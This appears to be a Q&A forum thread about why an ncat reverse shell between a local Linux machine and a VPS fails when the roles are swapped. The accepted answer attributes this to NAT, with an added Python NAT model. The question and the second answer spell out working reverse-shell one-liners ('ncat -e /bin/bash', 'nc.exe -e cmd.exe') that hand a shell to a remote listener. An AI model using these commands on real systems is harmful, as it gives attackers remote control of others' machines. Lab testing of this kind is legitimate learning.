
I’m facing a problem establishing a reverse shell using the Ncat (Nmap’s tool). At first it worked properly, but when I swap the target and attacking machine it doesn’t.

Case 1: I set up an Ubuntu virtual private server (IP address: 172.105.253.156); here the Ubuntu machine is my attacking machine and my local Linux machine is the target. Then I executed this command on my attacking machine:

    ncat -lnv 172.105.253.156 489

Then I attempted to connect to my attacking machine from my local machine (target), so I executed this:

    ncat -e "/bin/bash" 172.105.253.156 489

By doing so, the reverse shell is perfectly established.

Case 2: But when I swapped my machines, listening for the target on my local machine and trying to connect to the attacker (my local Linux machine) from the Ubuntu machine (target), no connection was established between them.

I’m completely new to the concept of reverse shells.


Answers


  1. Chosen as BEST ANSWER
    • Case 1: As it's a reverse shell connection, my firewall is freely allowing the outbound connection, so that I could connect to the victim's machine, and noticeably here the attacker is not behind NAT.
    • Case 2: But when my machine is listening for the victim and the victim tries to connect to my machine, it doesn't work, as my machine is hidden behind NAT.

    Trying the same thing on a VM with the network adapter configured in Bridged Mode (not NAT) will help, and port forwarding would also work perfectly.
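
The NAT behaviour described in the answer above, as an added Python example that is not part of the original answer: a toy model of a NAT router showing why the outbound connection in case 1 gets its replies while the unsolicited inbound connection in case 2 is dropped until a port forward exists. The router's public address, the local machine's private address and the source ports are constructed for illustration.

```python
# Added example: toy model of a NAT router (constructed, not a real network stack).
class NatRouter:
    def __init__(self, public_ip):
        self.public_ip = public_ip
        self.flows = {}      # public_port -> (inside_ip, inside_port, remote_ip, remote_port)
        self.forwards = {}   # public_port -> (inside_ip, inside_port)
        self._next_port = 40000

    def outbound(self, inside_ip, inside_port, remote_ip, remote_port):
        """An inside host connects out; the router records the flow."""
        public_port = self._next_port
        self._next_port += 1
        self.flows[public_port] = (inside_ip, inside_port, remote_ip, remote_port)
        return self.public_ip, public_port

    def add_port_forward(self, public_port, inside_ip, inside_port):
        """Static rule: deliver anything arriving on public_port to an inside host."""
        self.forwards[public_port] = (inside_ip, inside_port)

    def inbound(self, remote_ip, remote_port, public_port):
        """Return the inside (ip, port) that receives the packet, or None if dropped."""
        flow = self.flows.get(public_port)
        if flow and flow[2:] == (remote_ip, remote_port):
            return flow[:2]                     # reply on an existing outbound flow
        return self.forwards.get(public_port)   # static forward, otherwise dropped


def demo():
    vps = "172.105.253.156"            # public VPS address from the question
    local = "192.168.1.20"             # constructed private address of the local machine
    router = NatRouter("203.0.113.7")  # constructed public address of the home router
    out = {}
    # Case 1: the local machine connects out to the VPS listener on port 489.
    _, pub_port = router.outbound(local, 51000, vps, 489)
    out["case1_reply"] = router.inbound(vps, 489, pub_port)
    # Case 2: the VPS connects to port 489 on the router; no flow, no rule.
    out["case2_unsolicited"] = router.inbound(vps, 50000, 489)
    # Port forwarding makes case 2 work...
    router.add_port_forward(489, local, 489)
    out["case2_forwarded"] = router.inbound(vps, 50000, 489)
    # ...but the rule matches every source, not just the VPS.
    out["forward_any_source"] = router.inbound("198.51.100.9", 40001, 489)
    return out


if __name__ == "__main__":
    for name, delivered_to in demo().items():
        print(f"{name}: {delivered_to}")
```

A forwarding rule is not bound to one peer, so on a real router it should be restricted by source address or removed once the lab test is finished.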


  2. On your machine

    nc -nlvp 172.105.253.156 489
    

    On the victim machine

    nc 172.105.253.156 489 -e /bin/bash
    

    OR for Windows

    nc.exe 172.105.253.156 489 -e cmd.exe
    

    For reference: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
